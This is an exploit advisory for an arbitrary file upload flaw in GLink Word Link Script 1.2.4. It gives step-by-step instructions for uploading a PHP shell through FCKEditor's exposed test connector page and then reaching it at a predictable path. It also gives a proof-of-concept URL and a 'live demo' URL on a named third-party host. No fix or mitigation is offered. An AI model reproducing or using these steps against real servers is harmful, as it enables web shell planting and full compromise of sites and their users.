GLink Word Link Script version 1.2.4 suffers from an arbitrary file upload vulnerability.
2caaa10bebb7d2b87ecef572bf23d85331bd66b6a114f9ad58af2b411f25d4bc
################################################################################################
[+]GLink Word Link Script 1.2.4 (FCKEditor) Arbitrary File Upload
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
################################################################################################
[+] Arbitrary File Upload
1)Go to :
http://[target]/[path]/FCKEditor/editor/filemanager/browser/default/connectors/test.html
2)Choose your file.Select PHP as Connector.Hit upload.
3)You will find your file here :
http://[target]/[path]/UserFiles/File/your_shell.php
PoC:
http://127.0.0.1/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Live Demo :
http://dev.tufat.com/glink/FCKeditor/editor/filemanager/browser/default/connectors/test.html
################################################################################################